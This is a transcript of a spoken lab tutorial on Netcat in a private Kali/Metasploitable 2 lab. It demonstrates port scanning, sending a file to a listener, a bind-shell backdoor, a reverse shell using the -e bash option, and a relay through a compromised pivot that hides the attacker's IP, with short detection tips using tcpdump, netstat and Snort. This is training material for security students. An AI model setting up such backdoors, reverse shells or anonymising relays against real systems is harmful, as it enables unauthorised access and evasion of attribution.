Bismillahirrahmanirrahim. Welcome to the lab demonstration on Netcat tool. First, let me show you how to use the Netcat to scan the port information in the target system. So you can use the Kali or any other system as the attacking machine, and the target can be any system of your choice, either in the VMware or VirtualBox. It's up to you. Okay. So I'm using the Kali for my convenience. Same thing you can do with the VMware also. So you can use like Slingshot and Kali Linux and any system of your choice. Okay. So Netcat. Okay, then okay, the target system IP. So I want to scan the Metasploitable 2. Okay, the IP of the Metasploitable 2 is 1.10, and the port numbers I want to scan from 1 to 1000. Okay, so this is how we can use the Netcat to scan the target system. Ensure the exploitable 2 or any other system is up. So we use a flag ZV. So this is how we can use Netcat for scanning purpose. Then let us see how to transfer the files from one system to another system. Okay, for example, in Metasploitable 2, I'm going to use I'm going to create a file, echo, okay, hello is the content, okay, it's stored to a file, for example, a.txt. So you can see like ls, you can see a.txt, cat a.txt, you can see the file. Okay, so I put the netcat in the listening mode, ncat dash listening mode in the port number, okay, 444. And when the Metasploitable tool or tool or any other system sends some file, I want to catch and store that in another file. Okay, for example, let me say stolen is the file name. So now the netcat is in listening mode in the port number 444, and when some file comes from the target system, it would be stored in the file stolen. So I go to the Metasploitable 2, then Netcat, it would be running in the client mode, Netcat, then the IP of the target system 192.168.1 dot. Okay, so let me find what's the IP address. fconfig 1.13. And map hyphen ZV, okay, then port 444, and it is in sorry, not ZB, it is in listening mode 444, and if it some file comes, it should be stored in a file called stolen. Dash L listening mode. This is the port 444 stolen. Warning, no targets were specified. So I'm sorry, I made a big mistake, blunder. Netcat, I should be using the Netcat. So dash L dash P 444. Okay, then greater than stolen. So it's waiting for the connection from the other machine. So in the other machine, what I'm going to do is like netcat 1.13 is IP address, I think, of the system. 1.13. Um, the port number is 444, and I'm going to send the file. So I use less than symbol a.txt. Okay, then let me go to the, I think its IP is 16. Okay, 16 is IP. Connection refused. Maybe it is 13 is correct. Yeah, 13 is the correct IP. So let's go and check the stolen cat stolen. Yeah, it has come. So this IP is 16. The first one is correct. Sorry, 13 is correct. So the first one is correct. 1.13 is correct. So this is how you transfer the file from one system to another system. Okay, let me repeat once again. For example, stolen. Okay, then let me transfer that from another system, Ubuntu. So echo, okay, I am Ubuntu not greater than, okay, send.txt, then netcat 192.168.1.13 444. Okay, then less than send.txt. Okay, so let's check in the Kali cat stolen. So I am Ubuntu snot, so the file has come here. So this is how we transfer the data from one system to another using the snot, and also we can create a chat box using the netcat. So netcat dash L listening mode, okay, dash L, then dash P 444. Okay, so it is in listening mode. Okay, then I go to, either you can go to Metasploitable 2 or any other system, it's up to you. So netcat 192.168 1 dot what is that, dot 13, and the port is 444 I. Okay, then Here the message comes, hi, Ubuntu Snot, hi, Kali. So you can go here, hi, Ubuntu. So it would be available here. So this is how like we can chat between two different systems using the Netcat. Next, let me show you binding a shell. Attacker connects to a victim. Okay, in your lab manual, we finished transferring a file. We have finished. Yeah, we are here creating a Linux backdoor. Okay, then reverse window shell. So this is what I'm going to explain. Binding the shell, this part in your lab manual. Okay. Um, so basically, you have to put the victim. This is victim. Okay, so you have to execute this command in the victim system. So victim would be in listening mode and exposing um, the victim's shell to the attacker, and attacker would execute from system like Kali and connect to the shell. Okay, so let us choose this system, Ubuntu, or it's up to you. Even you can select this one, Metasploitable 2, or if Netcat is already installed in the Windows, or VMware, you can choose any. Okay, it's up to you. It's flexible. Okay, so now Netcat, let us put Netcat L dash P 444, then dash E. So for example, if dash E is not working in the Ubuntu, then you can go for even Metasploitable too. Okay. Otherwise, you have to update the uh, this Ubuntu system. Dash bin dash bash. So it is exposing its shell to the remote system, and it's waiting for the connection. So now we go to the attacker netcat. Okay, netcat 192.168.1.16.444. So I think we have connected to the shell. Okay, so we'll see test. Who am I? Yes, successfully we have connected to the victim system now. Ls, we can list the folders and files. Okay, we can create a folder, make dir, shimas. Okay, then cd shimas. We can go to that, and I can create a file touch a. So you can close the connection ls. So you can see, yeah, folder is there. Cd shima. Okay, ls. So you can see the file that has been created. Okay, so this is binding the shell. Okay, in your lab manual, creating a Linux backdoor, or we can call it as binding a shell. So how to detect? Okay, you can execute these commands. Okay, and you can check these kind of connections. So now actually, as part of thread hunting, I'm using this command TCP dump. Okay, it is capturing the packet and it is showing me that there is a connection, ongoing connection in the port 444 with the target system 1.13. Okay, so um, and similarly, there are many commands are available that we can use to detect the these kind of attacks. Okay, some of them like this TULPN, SS, grab, then Netstat, dash ANTP. So these are some of the commands that we can use to detect these kind of attacks. Also, you can run an intrusion detection system like snort and so on to do the detection. So this is the backdoor. Now let me explain you what is a reverse shell. So in the backdoor, what's happening is like um, uh, the victim is in the listener mode. Okay, now in the reverse shell, we would make the attacker in the listener mode. Okay, so attacker would be in the listener mode and the victim would be connecting through the client mode and exposing its shell. So now control C. So this is the attacker. Okay, this is the victim. So let us make the um, attacker in the listening mode. Netcat dash L dash P. Okay, so the attacker is in the listening mode and the victim would be running in the client and exposing its shell. So netcat 192.168.1.13 and dash E. You can see the difference. Okay, the previously in binding the shell, the victim was in the listening mode, but here now the victim is going to run in the client mode. Then bash. Okay, so first we have to run the Kadi. It's already in the listening mode. So now, okay, so the error is this. Which port to connect? Oh, okay, now, so already this is called reverse shelling. So in the reverse shelling, in the normal connection binding the shell, the attacker would be in the client mode, and in the reverse shell, the attacker would be in the listening mode. In the normal, attacker would be in the client mode. Sorry, in the normal, the attacker would be in the listening mode. In the reversal, victim would be in the client mode in the normal shell binding, and the victim would be in the client mode in the reverse shell. So now we can check the TCP dump is already running and it's catching this traffic. Okay, so this is part of threat intelligence. So this data go into the SIM tools and SIM tools use various techniques to detect the threats. So now we are finishing the reversal concept also. Next, let me explain the relay concept. Okay, relay concept. So now, for the relay concept, we need three machines. So I'm going to use like the Kali as the attacker and the middle system, the pivot system as this Ubuntu and the target Metasploitable 2. It's flexible. If you want, you can use Windows Server 2022 also as the target. Okay, so basically what I'm going to do is like from the Kali, I want to scan the Metasploitable 2. However, I want to hide my IP address. So I'm going to compromise a system in the middle. This is Ubuntu system. It's going to be a bot or a zombie system already whose security has been compromised by the attacker. So the attacker would execute a relay command in this middle system, and the attacker would communicate or connect with the middle system, pivot system, and this system on behalf of the attacker would scan the target system, okay, in a specific port and give the details back to the attacker. This is called relay. So the Kali, instead of directly scanning the Metasploitable 2, is scanning through the middle system. Okay, this is called Netcat relay. So let me explain this now. So we need first we have to execute the relay command in the Netcat. Okay. So first what we are going to do is we are going to create a named pipe. Create a named pipe on the relay machine. This is the first step. So this is a make FIFO back pipe. So we are creating a named pipe. So let me clear everything. Paste. So first, this is the first step. Create a named pipe. Once this is done, um, what we have to do is we are going to the main purpose, this pivot system is going to scan the target. Okay, it is going to scan the target. The target is the Metasploitable 2. So this is the target that the IP is 1.10. So the target is the Metasploitable 2, and it is going to scan the ports from 1 to 1000 using the flag ZV. Okay, so the pivot system in the middle, the intermediate system would scan. Already the attacker has compromised this middle system and put some script. This is the script, and that would run and scan the target system. So when your output comes, that output would be saved into this file, bagpipe. Already we have created that. So it would be copied into the bagpipe. Now, so the bagpipe has the result of the scanning. So Netcat scanning result is stored in the bagpipe. So all these things are happening in the pivot system, the middle system, intermediate system. So once the output is copied into this file bagpipe, you have the pipe operator. So once this entire task is completed, okay, now this part of the command execution would be executed now. So now the backpipe has the data, scanning data about the target. Now this is sent okay, to any system which is connecting to this pivot system through the port number 444. So this system you are activating in the listening mode, and the attacker would connect to this system through the port number 444. So once the attacker connects to the system through the port number 444, immediately this file would be sent to the attacker. Already, okay, this system has scanned the target and stored the output into the backpipe. Okay, and now any system that connects to this bot automatically transfer this file to that system. Okay, so now let's execute this command, copy. So it is listening on the port. Okay, it has scanned and it's listening on the port 444. Okay, the target this IP is the IP of the target system. That's the third one, metasploitable 2. Okay, now I go to the Kali now, Ncat. So the attacker is going to run in the client mode, NC 192.168.1.16 is the IP of the pivot system, the middle one. Okay, the system IP is 16. Okay, then the port number is 444. Okay, so when the attacker connect with the target system, it would send a file, right? So it could be stored in a file here. So scan result. Okay, or we can say result. Okay, from pivot. Okay, so now the scan should be happening here now, and it is directed in the TCP dump, or it can be directed using some intrusion detection systems. Okay, then let me go and disconnect cat result from pivot. Now you see the output. We got the output. So that attacker is not scanning the system, target system directly, but the attacker is using a pivot system. And you can see in the if there is an intrusion detection system in the target, it would record the pivot system IP, but not the IP of the uh, target. Okay, however, this is the pivot system. In this pivot system, the IP of the attacker is shown. But if there is ideas in the target, I mean in the Metasploitable 2, the IP of this Ubuntu or the pivot system would be recorded. So this is a benefit of this using the relay concept in the Netcat. So this one more thing, like this backpipe allows a duplex communication between the target and the attacker through the pivot system. So this is the benefit of using this named pipe. Okay, so that's it for this video tutorial. Thank you very much.